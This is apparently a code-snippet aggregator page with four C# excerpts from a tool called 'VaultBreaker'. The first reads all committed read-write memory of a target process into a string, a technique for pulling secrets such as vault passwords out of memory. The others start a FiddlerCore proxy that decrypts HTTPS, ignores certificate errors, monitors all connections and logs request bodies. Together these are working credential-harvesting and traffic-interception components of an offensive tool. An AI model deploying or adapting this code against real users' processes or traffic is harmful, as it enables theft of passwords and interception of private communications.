예제 #1
0
        public static string dumpProcessMemory(Process proc)
        {
            DebugFunctions.writeDebug("Starting Memory Dump", true);
            //Dumps Process Memory, Converts it to string array and returns. No writing to file needed.
            DebugFunctions.writeDebug("Opening Process", true);
            IntPtr hProc = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.QueryInformation | WinAPI.ProcessAccessFlags.VirtualMemoryRead, false, proc.Id);

            DebugFunctions.writeDebug("OpenProcess Returned", true);
            WinAPI.MEMORY_BASIC_INFORMATION64 mbi = new WinAPI.MEMORY_BASIC_INFORMATION64();
            //32 bit
            //WinAPI.MEMORY_BASIC_INFORMATION mbi32 = new WinAPI.MEMORY_BASIC_INFORMATION();
            WinAPI.SYSTEM_INFO si = new WinAPI.SYSTEM_INFO();
            if (hProc == IntPtr.Zero)
            {
                //Failed.
                Console.WriteLine("Unable to create a connection to the process! Error Code: {0}", WinAPI.GetLastError());
                Environment.Exit(6);
            }
            DebugFunctions.writeDebug("Process Handle isn't 0", true);
            WinAPI.GetSystemInfo(out si);
            IntPtr        hProc_min_addr = si.minimumApplicationAddress;
            IntPtr        hProc_max_addr = si.maximumApplicationAddress;
            long          hProc_long_min = (long)hProc_min_addr;
            long          hProc_long_max = (long)hProc_max_addr;
            int           bytesRead      = 0;
            StringBuilder sb             = new StringBuilder();

            while (hProc_long_min < hProc_long_max)
            {
                bytesRead = WinAPI.VirtualQueryEx(hProc, hProc_min_addr, out mbi, (uint)Marshal.SizeOf(typeof(WinAPI.MEMORY_BASIC_INFORMATION64)));
                //Console.WriteLine(mbi.AllocationBase + "\r\n" + mbi.AllocationProtect + "\r\n" + mbi.BaseAddress + "\r\n" + mbi.Protect + "\r\n" + mbi.RegionSize + "\r\n" + mbi.State + "\r\n" + mbi.Type + "\r\n" + mbi.__alignment1 + "\r\n" + mbi.__alignment2);
                //DebugFunctions.writeDebug(String.Format("Reading Memory - Current Location: {0}/{1}", hProc_long_min.ToString(), hProc_long_max.ToString()), Globals.DebugMode);
                if (mbi.Protect == WinAPI.PAGE_READWRITE && mbi.State == WinAPI.MEM_COMMIT)
                {
                    byte[] buffer = new byte[mbi.RegionSize];
                    WinAPI.ReadProcessMemory(hProc, mbi.BaseAddress, buffer, mbi.RegionSize, ref bytesRead);
                    for (long i = 0; i < mbi.RegionSize; i++)
                    {
                        sb.Append((char)buffer[i]);
                    }
                }
                //hProc_long_min += (int)Marshal.SizeOf(typeof(WinAPI.MEMORY_BASIC_INFORMATION64));
                hProc_long_min += mbi.RegionSize;
                hProc_min_addr  = new IntPtr(hProc_long_min);
            }
            //sw.Close();
            DebugFunctions.writeDebug("Finished Reading Memory, returning memory string.", Globals.DebugMode);
            return(sb.ToString());
        }
예제 #2
0
        public static void startProxy()
        {
            List <Fiddler.Session> oAllSessions = new List <Fiddler.Session>();

            Fiddler.FiddlerApplication.SetAppDisplayName("VaultBreaker");
            Fiddler.FiddlerApplication.AfterSessionComplete += AfterSessionComplete;
            Fiddler.FiddlerApplication.BeforeRequest        += delegate(Fiddler.Session oS)
            {
                // Console.WriteLine("Before request for:\t" + oS.fullUrl);
                // In order to enable response tampering, buffering mode MUST
                // be enabled; this allows FiddlerCore to permit modification of
                // the response in the BeforeResponse handler rather than streaming
                // the response to the client as the response comes in.
                oS.bBufferResponse = false;
                Monitor.Enter(oAllSessions);
                oAllSessions.Add(oS);
                Monitor.Exit(oAllSessions);
            };

            DebugFunctions.writeDebug(String.Format("Starting {0}...", Fiddler.FiddlerApplication.GetVersionString()), Globals.DebugMode);
            Fiddler.CONFIG.IgnoreServerCertErrors = true;
            CONFIG.bMITM_HTTPS = true;

            FiddlerApplication.Prefs.SetBoolPref("fiddler.network.streaming.abortifclientaborts", true);

            //What port you want to listen on.
            ushort iPort = 8888;

            FiddlerCoreStartupSettings startupSettings =
                new FiddlerCoreStartupSettingsBuilder()
                .ListenOnPort(iPort)
                .DecryptSSL()
                .MonitorAllConnections()
                .OptimizeThreadPool()
                .Build();

            Fiddler.FiddlerApplication.Startup(startupSettings);

            FiddlerApplication.Log.LogFormat("Created endpoint listening on port {0}", iPort);
        }
예제 #3
0
        static void AfterSessionComplete(Session sess)
        {
            if (sess.RequestMethod == "CONNECT")
            {
                return;
            }
            string body = sess.GetRequestBodyAsString();

            DebugFunctions.writeDebug(String.Format("Recieved POST with the following body\r\n[DEBUG] {0}\r\n[DEBUG]{1}", body, sess.RequestMethod), Globals.DebugMode);

            /**
             * if (sess.RequestMethod == "POST")
             * {
             *      string body = sess.GetRequestBodyAsString();
             *      if(body != "")
             *      {
             *              DebugFunctions.writeDebug(String.Format("Recieved POST with the following body\r\n[DEBUG] {0}\r\n[DEBUG]{1}",body,sess.RequestMethod));
             *      }
             *
             * }
             **/
        }
예제 #4
0
 public static void DoQuit()
 {
     DebugFunctions.writeDebug("Shutting down...", Globals.DebugMode);
     Fiddler.FiddlerApplication.Shutdown();
     Thread.Sleep(500);
 }